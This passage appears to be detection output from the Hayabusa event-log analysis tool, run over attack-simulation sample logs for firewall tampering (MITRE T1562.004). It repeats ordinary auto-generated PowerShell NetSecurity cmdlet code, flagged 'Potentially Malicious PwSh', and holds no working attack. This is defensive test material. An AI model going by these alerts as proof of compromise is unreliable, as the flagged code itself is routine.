'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { 
[object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 